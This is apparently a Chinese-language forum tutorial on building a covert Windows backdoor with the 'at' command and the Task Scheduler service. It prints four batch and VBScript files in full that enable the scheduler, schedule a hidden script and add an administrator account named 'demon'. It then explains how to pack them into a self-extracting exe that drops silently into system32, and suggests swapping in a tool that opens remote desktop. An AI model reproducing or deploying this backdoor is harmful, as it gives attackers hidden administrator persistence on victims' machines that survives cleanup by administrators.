schedule服务的后门应用

中国红啊

各位是否记得IPC$漏洞时用到的一个命令？ 没错，它就是at命令，其功能是在定时的时间内完成指定操作，而今天我们可以用它来做个一个隐蔽的后门程序。后门的功能就是在指定的时间创建一个系统用户
    at命令事实上对应了一个服务，名叫schedule服务，在services中我们可以找到一个task scheduler 的服务名称，这就是它所对应的服务了，但是在普遍情况下此服务时禁用的，我们要做的第一个操作就是开启这项服务。
    这个后门程序是一个自解压缩文件， 其实是由4个文件构成， 分别为a.vbs 、a.bat 、b.vbs、b.bat，这四个文件我们再用来合成一个自解压缩文件。4个文件代码其实很简单，我直接贴出：
// a.bat：
@echo off
@sc config schedule start= auto
@sc start schedule
ping 127.1
at time /interactive %systemroot%\system32\b.vbs
//time是自定义的时间，如 6：30

// a.vbs：
set ws=wscript.createobject("wscript.shell")
ws.run "a.bat",0
wscript.sleep 10000

// b.bat：
@echo off
@net user demon demon /add
@net localgroup administrators demon /add

//b.vbs：
set ws=wscript.createobject("wscript.shell")
ws.run "b.bat",0
wscript.sleep 10000

我们把四个文件一次合成为一个自解压缩文件，解压路径为 system32 目录，解压后运行a.vbs 其他选项设置为隐藏即可。
生成一个test.exe就是一个后门程序了，我们来看下流程，运行test.exe  文件将会解压到system32目录，紧接着运行a.vbs，a.vbs又是以隐藏模式运行a.bat，a.bat 设置了指定时间运行b.vbs  ， 当到了指定时间后，b.vbs运行，b.vbs又是以隐藏模式执行b.bat，这样就神不知鬼不觉的添加了个系统账户，其实B.BAT我们可以换成一个自开3389或者是类似的后门工具。这样就不怕管理员删除我们的后门程序了，因为当在指定时间，又会执行一次后门程序。
     本文内容简单，重要还是各位思路的运用了。